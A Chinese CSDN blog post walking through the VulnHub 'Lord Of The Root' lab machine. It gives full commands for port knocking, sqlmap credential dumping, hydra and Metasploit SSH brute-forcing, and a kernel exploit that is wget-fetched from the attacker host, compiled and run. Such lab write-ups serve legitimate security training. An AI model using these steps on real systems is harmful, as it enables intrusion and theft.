lordoftheroot

最新推荐文章于 2024-02-03 14:57:35 发布
最新推荐文章于 2024-02-03 14:57:35 发布
阅读量476 收藏
点赞数
分类专栏: 靶机学习 文章标签: ssh 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45821131/article/details/125245416
版权

开放22端口,ssh连接尝试

ssh 192.168.19.174

提示1,2,3 意在端口碰撞

没有knock命令需要先安装


另一种命令

安装不成功时需要换源见尾部内容

安装完成后使用

knock 192.168.19.174 1 2 3 -v

再次扫描全端口,发现1337端口

访问1337端口,发现一张图片,没什么价值

访问robots.txt文件

查看源码,发现一串字符(base64编码)

THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh

另一种解码方式

echo 'THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh' | base64 -d

发现还有一层,继续解码

Lzk3ODM0NTIxMC9pbmRleC5waHA=

发现网站首页,访问查看

是一个登录界面

尝试sql注入

直接利用sqlmap跑

sqlmap -u "http://192.168.19.174:1337/978345210/index.php" --forms

一路回车即可

可以看到最下面,提到又基于时间的盲注漏洞

尝试爆库

sqlmap -u "http://192.168.19.174:1337/978345210/index.php" --forms  --dbs

爆出来四个数据库

[*] information_schema

[*] mysql

[*] performance_schema

[*] Webapp

针对Webapp数据库进行爆破里面的表

sqlmap -o -u "http://192.168.19.174:1337/978345210/index.php" --forms -D Webapp --tables

发现一个表Users

爆破字段名

sqlmap -o -u "http://192.168.19.174:1337/978345210/index.php" --forms -D Webapp -T Users --columns

爆破字段内容信息

sqlmap -o -u "http://192.168.19.174:1337/978345210/index.php" --forms -D Webapp -T Users --columns -C id,username,password --dump

将拿到的用户名密码字段写入字典user.txt和password.txt中

第一种hydra爆破

hydra -L user.txt -P password.txt 192.168.19.174 ssh

第二种msf爆破

msfconsole

search ssh_login

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.19.174

set user_file /root/lordoftheroot/user.txt

set pass_file /root/lordoftheroot/password.txt

set stop_on_success true

ssh 登录

提权

searchsploit 39166.c

locate linux/local/40847.cpp  有时候这个命令不灵

cp /usr/share/exploitdb/exploits/linux/local/39166.c ./

python -m SimpleHTTPServer 8081

wget http://192.168.19.147:8081/39166.c

gcc 39166.c -o lordoftheroot

chmod +x lordoftheroot

./lordoftheroot

cd /root

cat Flag.txt

无人问津的椰子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
小白的靶机-VulnHub-Lord Of The Root
wo41ge的博客
12-16 273
靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 目标:得到root权限&找到flag.txt 开机就是个这 目标计算机IP地址:192.168.120.135 只有一个22 端口 尝试 ssh连接 这里有一个知识点: 端口碰撞: 端口上的防火墙通过产生一组预先指定关闭的端口进行连接尝试, 一旦接收到正确的连接尝试序列,防火墙规则就会动态修改, 以允许发送连接尝试的主机通过特定端口进行连接。 使用ping命令冲撞三次试试1,
Vulnhub靶机 Lord of the root
菜浪马废的博客
09-15 327
只开放了22端口 searchsploit上没用可利用的漏洞 连接一下 提示要敲门 for x in 1 2 3; do nmap -Pn --max-retries 0 -p $x 192.168.80.137; done
vulhub ——LordOfTheRoot_1.0.1
战神/calmness的博客
05-21 287
信息探测 发现22号端口 使用PING 测试进行攻击 hping3 -S 192.168.18.150 -p 1 -c 1 hping3 -S 192.168.18.150 -p 2-c 1 hping3 -S 192.168.18.150 -p 3-c 1 再次进行扫描 root@kali:~# nmap -p- -T5 -A 192.168.18.150 http://192.168.18.150:1337/978345210/index.php 发现存在SQL注入...
靶机渗透练习43-Lord Of The Root
hirak0的博客
04-19 2098
靶机描述 靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ Description I created this machine to help others learn some basic CTF hacking strategies and some tools. I aimed this machine to be very similar in difficulty to those I was breaking on
portknocking(端口试探)简介
moxuansheng的专栏
05-25 2689
端口试探(port knocking)是一种通过连接尝试,从外部打开原先关闭端口的方法。一旦收到正确顺序的连接尝试,防火墙就会动态打开一些特定的端口给允许尝试连接的主机。单一数据包认证(Single Packet Authentication),则是通过一个加密数据包,进行一次的端口试探。       端口试探的主要目的是防治攻击者通过端口扫描的方式对主机进行攻击。       端口试
LordOfTheRoot_1.0.1(VulnHub)
carmi的博客
11-13 107
LordOfTheRoot_1.0.1_Writeup 目录LordOfTheRoot_1.0.1_Writeup1、主机存活探测2、尝试仅仅开放了22端口3、由提升进行端口碰撞4、敲震三次后进行全端口扫描5、信息枚举不摸所F12调试界面跑目录跑不出来,只能手测base双重解码后发现新东西6、发现目录7、SQLmap注入8、通过数据库账号密码登入9、尝试爆破10、SSH登录11、EXP内核提权查...
红队渗透测试之Lord Of The Root——缓冲区溢出
qq_69775412的博客
09-13 1299
该项目是KookSec作者精心制作的项目环境,目标是获取获得root权限并找到flag.txt文本信息,这是KoocSec为黑客练习准备的另一个Boot2Root挑战。他通过OSCP考试的启发准备了这一过程。它基于伟大的小说改制电影《指环王》的概念,该作者评定该环境为渗透中级水准难度。接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该的技巧和文章都能学习到一些红队知识。
红队渗透靶机:LORD OF THE ROOT: 1.0.1
最新发布
分享
02-03 743
红队渗透靶机:LORD OF THE ROOT: 1.0.1。。。简单的时间盲注,内核提权!
No.6-VulnHub-Lord Of The Root: 1.0.1-Walkthrough渗透学习
qq_34801745的博客
01-01 2123
** VulnHub-Lord Of The Root: 1.0.1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 靶机难度:中等(CTF) 靶机发布日期:2015年9月23日 靶机描述:这是KoocSec为黑客练习准备的另一个Boot2Root挑战。他通过OSCP考试的启发准备了这一过程。它...
vulnhub LordOfTheRoot 1.0.1
底层社会中的弱智
06-16 426
1
vulnhub靶场之 LordOfTheRoot_1.0.1
wanan的博客
10-09 1003
vulnhub靶场之 LordOfTheRoot_1.0.1
LoadOfTheRoot提权学习
weixin_56537388的博客
07-07 392
S(--syn):SYN是TCP/IP建立连接时使用的握手信号。这时候ESP变了,指向了ffffc810地址,这是nop sled的地址开始处,当ESP指向该地址处后,就会执行栈堆空间的payload获得shell,那么接下来就是要爆破。缓冲区溢出的在生成shellcode时,会影响输入的字符,比如’n’字符会终止输入,会截断输入导致我们输入的字符不能完全进入缓冲区。能看到1-8是正常的,后门就全乱了,怀疑0x08后面的0x00和0x09是个坏字符,至于后面全乱序猜测是因为0x0a换行符的问题。
2021年1月1日-Vulnhub-LordOfTheRoot 渗透学习
AnonyMousIT的博客
01-01 722
2021年1月1日-LordOfTheRoot 渗透学习 一、简介 靶机下载地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ kali地址:192.168.31.77 靶机IP地址:192.168.31.95 二、信息收集 发现靶机IP地址:192.168.31.95 扫描到开放着 22端口 先将22端口作为突破口,访问一下 提示 Easy as 1,2,3 可能存在端口碰撞 端口碰撞尝试一下 重新扫描 发现1337端口 通过浏览
LordOfTheRoot_1.0.1靶机入侵
RestoreJustice的博客
03-15 319
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。下载地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.138。Linux系统中使用.so后缀的,sqlmap中的这两个文件经过了编码,不能直接使用。这里用的是msf里面的。
VulnHub-Lord Of The Root_1.0.1(打个靶机玩一下)
weixin_44954642的博客
08-08 444
该篇章目的是牢固地基,加强每日训练操作的笔记,在记录笔记中会有很多跳跃性思维的操作和方式方法,大家一起加油,动起来。
VulnHub-Lord Of The Root_1.0.1-靶机渗透学习
嗯嗯呐的博客
11-17 769
靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 靶机难度:中等(CTF) 靶机描述:这是KoocSec为黑客练习准备的另一个Boot2Root挑战。他通过OSCP考试的启发准备了这一过程。它基于伟大的小说改制电影《指环王》的概念。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 一、信息采集 nmap扫描确定靶机IP地址 扫描靶机对外开放端口,开始信息采集 只扫描出22端口 连接22端口获得提示 knock f
oscp—Me and My Girlfriend 1练习
王嘟嘟的博客
01-12 1270
0x00 前言 为oscp做准备的练习,Me and My Girlfriend 1。由于不知道怎么练习,就随便下载了一个进行练习在这里做一个笔记。 0x01 实验 下载好文件之后,配置为NET模式。 1.目标探测 探测这里使用了nmap进行探测,可以看到时间为10.4秒。 nmap -sP -T4 192.168.25.1/24 这里也可以使用masscan 进行扫描,可以明显感觉速度变快了...
FTP枢轴攻击
dfdhxb995397的博客
10-13 161
简单来说,这是攻击者可以利用属于不同网络的那些系统的攻击。 本文作者:jishuzhain 对于这种攻击,攻击者需要利用主服务器来帮助攻击者将自己添加到本地网络中,然后攻击者就可以将客户端系统进行定位,然后攻击。 实验环境要求: 攻击机:Kali Linux 枢纽机:具有两个网络接口的windows系统 目标机器:windows7(允许FTP服务) 利用枢纽机 使用ex...
穷举篇(七)
不秃头的程序Yang
06-03 339
metasploit穷举模块的使用 对apache-tomcat服务进行穷举
kali爆破tomcat账户密码
weixin_44281516的博客
04-16 1034
首先启动msfconsole 第二步search tomcat 第三步useauxiliary/scanner/http/tomcat_mgr_login,show options 第四步更改配置 set rhost ip (目标IP),set rport port(目标端口),set STOP_ON_SUCCESS true (爆破成功是停止)在show options...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值